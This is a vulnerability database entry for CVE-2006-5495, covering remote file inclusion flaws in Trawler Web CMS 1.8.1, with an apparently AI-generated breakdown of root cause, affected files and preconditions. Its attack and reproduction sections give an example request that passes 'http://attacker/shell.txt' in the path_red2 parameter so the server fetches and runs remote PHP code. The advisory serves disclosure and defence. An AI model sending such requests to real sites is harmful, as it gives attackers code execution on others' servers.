CVE-2006-5495
Description
Multiple PHP remote file inclusion vulnerabilities in Trawler Web CMS 1.8.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) path_red2 parameter to (a) _msdazu_pdata/redaktion/artikel/up/index.php; (b) addtort.php, (c) colorpik2.php, (d) colorpik3.php, (e) extras_menu.php, (f) farbpalette.php, (g) lese_inc.php, and (h) newfile.php in _msdazu_share/richtext/; the (2) path_scr_dat2 parameter to (i)_msdazu_share/share/insert1.php; the (3) path_red parameter to (j) _msdazu_share/extras/downloads/index.php; and unspecified parameters in other files.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2- Range: <=1.8.1
Patches
Vulnerability mechanics
Root cause
"Multiple PHP files use unsanitized user-supplied parameters directly in include/require statements, enabling remote file inclusion."
Attack vector
An attacker sends HTTP GET requests to any of the listed PHP scripts, appending a URL in the vulnerable parameter (e.g., `?path_red2=http://attacker/shell.txt`). The script passes this user-supplied URL directly into a PHP include or require call, causing the server to fetch and execute arbitrary PHP code from the attacker-controlled remote host [ref_id=1]. No authentication is required, and the only precondition is that the target runs Trawler Web CMS 1.8.1 or earlier with the vulnerable files accessible.
Affected code
The vulnerable files are located under the `_msdazu_pdata/redaktion/artikel/up/index.php`, `_msdazu_share/richtext/` (addtort.php, colorpik2.php, colorpik3.php, extras_menu.php, farbpalette.php, lese_inc.php, newfile.php), `_msdazu_share/share/insert1.php`, and `_msdazu_share/extras/downloads/index.php` paths. These scripts accept the `path_red2`, `path_scr_dat2`, and `path_red` parameters without sanitization and use them in PHP include/require statements [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory does not provide a fix; the exploit entry simply notes that Trawler 1.8.1 is "openbug" and lists the vulnerable parameters [ref_id=1]. To remediate, administrators should either upgrade to a patched version (if one exists) or remove the vulnerable files, and ensure that `allow_url_include` is disabled in php.ini to block remote file inclusion attacks.
Preconditions
- configThe target must be running Trawler Web CMS version 1.8.1 or earlier.
- networkThe vulnerable PHP files must be accessible via the web server.
- configPHP's allow_url_include must be enabled (default in older PHP versions).
- authNo authentication or prior access is required.
Reproduction
1. Identify a target running Trawler Web CMS 1.8.1. 2. Send a GET request to one of the vulnerable scripts with a remote URL in the parameter, e.g.: `http://target/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://attacker/shell.txt` 3. The server will fetch and execute the attacker-supplied PHP code [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
19- www.securityfocus.com/bid/20662nvdExploit
- secunia.com/advisories/22525nvdVendor Advisory
- cmsblog.msdazu.denvd
- securitytracker.com/idnvd
- www.osvdb.org/29960nvd
- www.osvdb.org/29961nvd
- www.osvdb.org/29962nvd
- www.osvdb.org/29963nvd
- www.osvdb.org/29964nvd
- www.osvdb.org/29965nvd
- www.osvdb.org/29966nvd
- www.osvdb.org/29967nvd
- www.osvdb.org/29968nvd
- www.osvdb.org/29969nvd
- www.securityfocus.com/archive/1/449459/100/0/threadednvd
- www.securityfocus.com/bid/20678nvd
- www.vupen.com/english/advisories/2006/4152nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/29715nvd
- www.exploit-db.com/exploits/2611nvd
News mentions
0No linked articles in our index yet.